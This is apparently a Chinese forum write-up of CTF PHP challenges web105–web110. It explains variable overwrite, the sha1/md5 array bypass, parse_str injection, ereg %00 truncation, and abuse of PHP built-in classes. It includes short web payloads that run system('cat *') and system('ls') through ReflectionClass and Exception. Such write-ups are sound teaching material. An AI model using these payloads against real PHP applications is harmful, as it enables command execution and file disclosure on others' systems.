<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pln">suces</span><span class="pun">=</span><span class="pln">flag</span></code></li><li class="L1"><code class="lang-groovy"><span class="pln">DATA</span><span class="pun">:</span></code></li><li class="L2"><code class="lang-groovy"><span class="pln">flag</span><span class="pun">=</span></code></li><li class="L3"><code class="lang-groovy"><span class="pun">实际代码为：</span></code></li><li class="L4"><code class="lang-groovy"><span class="pln">GET</span><span class="pun">:</span></code></li><li class="L5"><code class="lang-groovy"><span class="pln">$suces</span><span class="pun">=</span><span class="pln">$flag</span></code></li><li class="L6"><code class="lang-groovy"><span class="pln">POST</span><span class="pun">=</span></code></li><li class="L7"><code class="lang-groovy"><span class="pln">$flag</span><span class="pun">=</span></code></li></ol></pre>
<p>传入的flag的值为空，所以满足$_POST[‘flag’]==$flag这个条件，都为空，所以跳入下一个die函数，输出$suces变量（即$flag）</p>
<h2 id="h2-web106"><a name="web106" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web106</h2><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1612323115698-9d735f11-045e-430d-968b-2949cc1d4ad1.png#align=left&amp;display=inline&amp;height=344&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=344&amp;originWidth=683&amp;size=13166&amp;status=done&amp;style=none&amp;width=683" alt="image.png"><br>还是在考察sha1函数遇到数组返回false的特性</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">v2</span><span class="pun">[]=</span><span class="lit">1</span></code></li><li class="L1"><code class="lang-groovy"><span class="pln">DATA</span><span class="pun">:</span></code></li><li class="L2"><code class="lang-groovy"><span class="pln">v1</span><span class="pun">[]=</span><span class="lit">2</span></code></li></ol></pre>
<h2 id="h2-web107"><a name="web107" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web107</h2><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1612323250503-4b0d6871-2baa-4838-84f9-ee1d667a4f3b.png#align=left&amp;display=inline&amp;height=388&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=388&amp;originWidth=630&amp;size=12647&amp;status=done&amp;style=none&amp;width=630" alt="image.png"><br>这道题主要在考察parse_str这个函数</p>
<blockquote>
<p>parse_str — 将字符串解析成多个变量</p>
</blockquote>
<p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1612324411021-bd747b8e-3864-4a02-96ba-1c768ef83a33.png#align=left&amp;display=inline&amp;height=416&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=416&amp;originWidth=1183&amp;size=52746&amp;status=done&amp;style=none&amp;width=1183" alt="image.png"><br>所以我们可以在v1中将flag,已经flag的值以数组的元素的形式传入到$v2中，那后面的MD5就很简单了，我们只需传入一个加密好的md5值即可</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">v3</span><span class="pun">=</span><span class="typ">Sn0w</span></code></li><li class="L1"><code class="lang-groovy"><span class="pln">DATA</span><span class="pun">:</span></code></li><li class="L2"><code class="lang-groovy"><span class="pln">v1</span><span class="pun">=</span><span class="pln">flag</span><span class="pun">=</span><span class="lit">23017235f7fca0f545423eecd9b57686</span></code></li></ol></pre>
<h2 id="h2-web108"><a name="web108" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web108</h2><h4 id="h4--ereg-"><a name="考点：ereg函数" class="reference-link"></a><span class="header-link octicon octicon-link"></span>考点：ereg函数</h4><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1612324604630-2c9267fc-e4df-4dc8-a492-9e3e9807bfb7.png#align=left&amp;display=inline&amp;height=350&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=350&amp;originWidth=754&amp;size=13496&amp;status=done&amp;style=none&amp;width=754" alt="image.png"></p>
<blockquote>
<p>ereg()函数搜索由指定的字符串作为由模式指定的字符串，如果发现模式则返回true，否则返回false，搜索对于字母字符是区分大小写的，用于正则表达式匹配。</p>
<p>一、ereg()函数存在NULL截断漏洞,可以%00截断，遇到%00则默认为字符串的结束，所以可以绕过一些正则表达式的检查。<br>二、ereg()只能处理字符串的，遇到数组做参数返回NULL。</p>
</blockquote>
<p>这道题便是在考察ereg函数的第一个漏洞，后面两个函数都比较简单，一个是strrev函数，用于反转字符串，另一个函数的作用是用于获取变量的整数值。</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="lit">0x36d</span><span class="pun">的十进制=&gt;</span><span class="lit">877</span></code></li><li class="L1"><code class="lang-groovy"><span class="pun">故</span><span class="pln">payload</span><span class="pun">为:</span></code></li><li class="L2"><code class="lang-groovy"><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">a</span><span class="pun">%</span><span class="lit">00778</span></code></li></ol></pre>
<p>第一个if条件到a便结束了，第二个if条件从778开始，转换后便是877，本地测试如下：<br><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1612439483523-e1643e85-4639-4172-ab24-81e2ef13d41b.png#align=left&amp;display=inline&amp;height=247&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=247&amp;originWidth=525&amp;size=14965&amp;status=done&amp;style=none&amp;width=525" alt="image.png"></p>
<h2 id="h2-web109"><a name="web109" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web109</h2><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1612439549489-2453c7c6-ecb6-47a7-a470-edafb1c59c81.png#align=left&amp;display=inline&amp;height=323&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=323&amp;originWidth=816&amp;size=14001&amp;status=done&amp;style=none&amp;width=816" alt="image.png"><br>看到echo new想起了前面也做过一个这样的，是考察ReflectionClass反射类的，测试一下这道题是否可用<br><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1612440674291-17be5d02-b905-4f30-949f-2eba893b798e.png#align=left&amp;display=inline&amp;height=425&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=425&amp;originWidth=1267&amp;size=42301&amp;status=done&amp;style=none&amp;width=1267" alt="image.png"><br>可以使用，这里还发现一个比较好玩的地方，虽然源代码中含有了括号，但是我们还是可以自己加上去，以及在里面设置参数，后面多出的（）不对结果造成影响</p>
<p>payload为：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">v1</span><span class="pun">=</span><span class="typ">ReflectionClass</span><span class="pun">&amp;</span><span class="pln">v2</span><span class="pun">=</span><span class="pln">system</span><span class="pun">(</span><span class="str">'cat *'</span><span class="pun">)</span></code></li></ol></pre>
<p>除下这种方法，还可以使用PHP异常处理（Exception）来做这道题，先简单了解一下PHP异常处理<br><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1612440923197-8d4e6d9f-7c65-4677-b21a-15bf6ad505e4.png#align=left&amp;display=inline&amp;height=300&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=300&amp;originWidth=932&amp;size=42035&amp;status=done&amp;style=none&amp;width=932" alt="image.png"></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">v1</span><span class="pun">=</span><span class="typ">Exception</span><span class="pun">&amp;</span><span class="pln">v2</span><span class="pun">=</span><span class="pln">system</span><span class="pun">(</span><span class="str">'ls'</span><span class="pun">)</span></code></li></ol></pre>
<p>这里举个例子，方便理解异常类</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-groovy"><span class="com">// 创建一个有异常处理的函数</span></code></li><li class="L2"><code class="lang-groovy"><span class="kwd">function</span><span class="pln"> checkNum</span><span class="pun">(</span><span class="pln">$number</span><span class="pun">)</span></code></li><li class="L3"><code class="lang-groovy"><span class="pun">{</span></code></li><li class="L4"><code class="lang-groovy"><span class="pln">    </span><span class="kwd">if</span><span class="pun">(</span><span class="pln">$number</span><span class="pun">&gt;</span><span class="lit">1</span><span class="pun">)</span></code></li><li class="L5"><code class="lang-groovy"><span class="pln">    </span><span class="pun">{</span></code></li><li class="L6"><code class="lang-groovy"><span class="pln">        </span><span class="kwd">throw</span><span class="pln"> </span><span class="kwd">new</span><span class="pln"> </span><span class="typ">Exception</span><span class="pun">(</span><span class="str">"变量值必须小于等于 1"</span><span class="pun">);</span></code></li><li class="L7"><code class="lang-groovy"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L8"><code class="lang-groovy"><span class="pln">        </span><span class="kwd">return</span><span class="pln"> </span><span class="kwd">true</span><span class="pun">;</span></code></li><li class="L9"><code class="lang-groovy"><span class="pun">}</span></code></li><li class="L0"><code class="lang-groovy"></code></li><li class="L1"><code class="lang-groovy"><span class="com">// 在 try 块 触发异常</span></code></li><li class="L2"><code class="lang-groovy"><span class="kwd">try</span></code></li><li class="L3"><code class="lang-groovy"><span class="pun">{</span></code></li><li class="L4"><code class="lang-groovy"><span class="pln">    checkNum</span><span class="pun">(</span><span class="lit">2</span><span class="pun">);</span></code></li><li class="L5"><code class="lang-groovy"><span class="pln">    </span><span class="com">// 如果抛出异常，以下文本不会输出</span></code></li><li class="L6"><code class="lang-groovy"><span class="pln">    echo </span><span class="str">'如果输出该内容，说明 $number 变量'</span><span class="pun">;</span></code></li><li class="L7"><code class="lang-groovy"><span class="pun">}</span></code></li><li class="L8"><code class="lang-groovy"><span class="com">// 捕获异常</span></code></li><li class="L9"><code class="lang-groovy"><span class="kwd">catch</span><span class="pun">(</span><span class="typ">Exception</span><span class="pln"> $e</span><span class="pun">)</span></code></li><li class="L0"><code class="lang-groovy"><span class="pun">{</span></code></li><li class="L1"><code class="lang-groovy"><span class="pln">    echo </span><span class="str">'Message: '</span><span class="pln"> </span><span class="pun">.</span><span class="pln">$e</span><span class="pun">-&gt;</span><span class="pln">getMessage</span><span class="pun">();</span></code></li><li class="L2"><code class="lang-groovy"><span class="pun">}</span></code></li><li class="L3"><code class="lang-groovy"><span class="pun">?&gt;</span></code></li><li class="L4"><code class="lang-groovy"><span class="pln">上面代码将得到类似这样一个错误：Message: 变量值必须小于等于 1</span></code></li></ol></pre>
<h2 id="h2-web110"><a name="web110" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web110</h2><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1612441651377-603f91ec-0e1b-4d61-b185-01525779dccc.png#align=left&amp;display=inline&amp;height=458&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=458&amp;originWidth=1270&amp;size=30158&amp;status=done&amp;style=none&amp;width=1270" alt="image.png"><br>这道题用上面两个方法就不行了，因为这里将括号等符号全过滤了，这道题看了官方的提示，考察的是PHP的内置类FilesystemIterator </p>
<p>先简单了解一下这个类的作用</p>
<blockquote>
<p>PHP使用FilesystemIterator迭代器遍历目录</p>
</blockquote>
<p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1612443618473-c46396de-3ebf-48d3-a8f0-ce261f052b7e.png#align=left&amp;display=inline&amp;height=475&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=475&amp;originWidth=1587&amp;size=59401&amp;status=done&amp;style=none&amp;width=1587" alt="image.png"><br>所以只需获取当前路径，便可以将当前目录下所有文件给显示出来，这里可以使用php中的getcwd这个函数</p>
<blockquote>
<p>getchwd() 函数返回当前工作目录</p>
</blockquote>
<p>故payload为</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">v1</span><span class="pun">=</span><span class="typ">FilesystemIterator</span><span class="pun">&amp;</span><span class="pln">v2</span><span class="pun">=</span><span class="pln">getcwd</span></code></li></ol></pre>
</div>
用户名金币积分时间理由
veek 150.00 0 2021-02-05 10:10:15 学习审计思路~

打赏我,让我更有动力~

0 条回复   |  直到 2021-2-4 | 2226 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2025 掌控者 All Rights Reserved.